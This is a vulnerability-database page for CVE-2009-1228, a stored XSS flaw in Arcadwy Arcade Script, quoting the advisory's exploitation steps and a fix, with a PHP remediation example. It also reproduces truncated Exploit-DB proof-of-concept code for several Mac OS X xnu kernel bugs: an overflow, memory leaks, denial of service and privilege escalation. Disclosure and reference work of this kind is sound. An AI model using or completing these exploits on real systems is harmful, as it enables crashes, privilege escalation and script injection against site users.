CVE-2009-1228
Published 2009-04-02
Priority: P4 | 18 | medium | CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.52% (71.5th percentile)
Cross-site scripting (XSS) vulnerability in register.php in Arcadwy Arcade Script CMS allows remote attackers to inject arbitrary web script or HTML via the username field (user_name parameter).
No detection rules found.
Exploit-DB
Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting
exploitdb·2009-03-27
CVE-2009-1228 Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting
---
#################################\
# Information
# Script : Arcadwy Arcade Script CMS
# Buy/Download : http://arcadwy.com/
# Vulnerability : Static XSS
# Discovered by : Anarchy Angel
# Contact : anarchy[dot]ang31 [@] gmail
# Website : http://hha.zapto.org
# Greets : Xteaphn, lun0s, BSDgurl, progenic.
\#################################/
[!] EXPLOIT
1) Go to http://site.com/register.php
2) In username field input XSS payload
3) Fill in the rest of the fields and submit.
4) Activate account!
Every time the account's username is shown on the site the XSS will run.
Usernames show in comments, game scores, and so on.
[!] FIX: Sanitize all input from the registers page form.
# milw0rm.com [2009-03-27]
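The fix the advisory asks for has two halves: validate the username when register.php receives it, and HTML-encode it wherever it is later displayed (comments, game scores). The PHP below is an added example, not code from the advisory or from Arcadwy; the function names and the username policy are assumptions.

```php
<?php
// Added example, not Arcadwy's code. Function names and the username
// policy (3-20 letters, digits, underscore, hyphen) are assumptions.

// Registration side: $raw stands for the submitted user_name value.
// Reject anything outside the allowlist rather than stripping characters.
function validate_username(string $raw): ?string
{
    $name = trim($raw);
    // \A and \z anchor the whole string; '$' alone would accept a trailing newline.
    if (preg_match('/\A[A-Za-z0-9_-]{3,20}\z/', $name) !== 1) {
        return null;
    }
    return $name;
}

// Display side: encode for the HTML context on every output, so rows
// stored before validation existed are rendered as text as well.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_score_row(string $username, int $score): string
{
    return '<tr><td>' . h($username) . '</td><td>' . $score . '</td></tr>';
}

// Constructed sample input: one ordinary name and one containing markup.
$samples = ['player_one', '<i>name</i>'];
foreach ($samples as $submitted) {
    $accepted = validate_username($submitted);
    echo ($accepted === null ? 'rejected' : 'accepted'), ': ', h($submitted), "\n";
    // Simulates a legacy row that already holds the raw value.
    echo render_score_row($submitted, 1200), "\n";
}
```

Validation alone does not cover usernames already stored, which is why the encoding step is applied at every place a username is printed.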
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
---
/* xnu-macfsstat-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a)
#define LEAK_MACBYTES(a) (sizeof (int)*a)
struct __mac_getfsstat {
char *buf; char _pad[4];
int bufsize; char __pad[4];
char *mac; char ___pad[4];
int macsize; char ____pad[4];
int flags; char _____pad[4];
};
int
main (int argc, char **argv)
{
struct __mac_getfsstat req;
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
memset (&req, 0, sizeof req);
req.buf = (char *) 0xDEADBEEF;
req.bufsize = LEAK_BUFBYTES (65536 * 64);
req.mac = (char *) 0xDEADBEEF;
req.macsize
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
---
/* xnu-profil-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
/* profil defines */
#define PROFIL_LEAK_NUM 65536 * 128
int
main (int argc, char **argv)
{
char buf[1024];
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
printf ("* opening profil, pid: %d...", getpid ());
if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0)
{
fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n",
argv[0], n);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32);
fflush (stdout);
for (i = 0; i < PROFIL_LEAK_NUM; i++)
{
if ((n = syscall (SYS_
Exploit-DB
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1238 Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
---
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating ham
Exploit-DB
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
exploitdb·2009-03-23
CVE-2009-1235 Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
---
#!/bin/bash
# * xnu-hfs-fcntl-v2.sh
# *
# * Copyright (c) 2008 by
# *
# * Apple MACOS X 792.0 \n" \
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"
if [ ! -f $EXPFILE ]; then
echo -n "* compiling exploit..."
gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
if [ ! -f $IMAGE.dmg ]; then
echo -n "* creating diskimage..."
hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
echo -e "* executing exploit...\n"
./$E
http://secunia.com/advisories/34506
http://www.securityfocus.com/bid/34275
https://exchange.xforce.ibmcloud.com/vulnerabilities/49472
https://www.exploit-db.com/exploits/8296
Published: 2009-04-02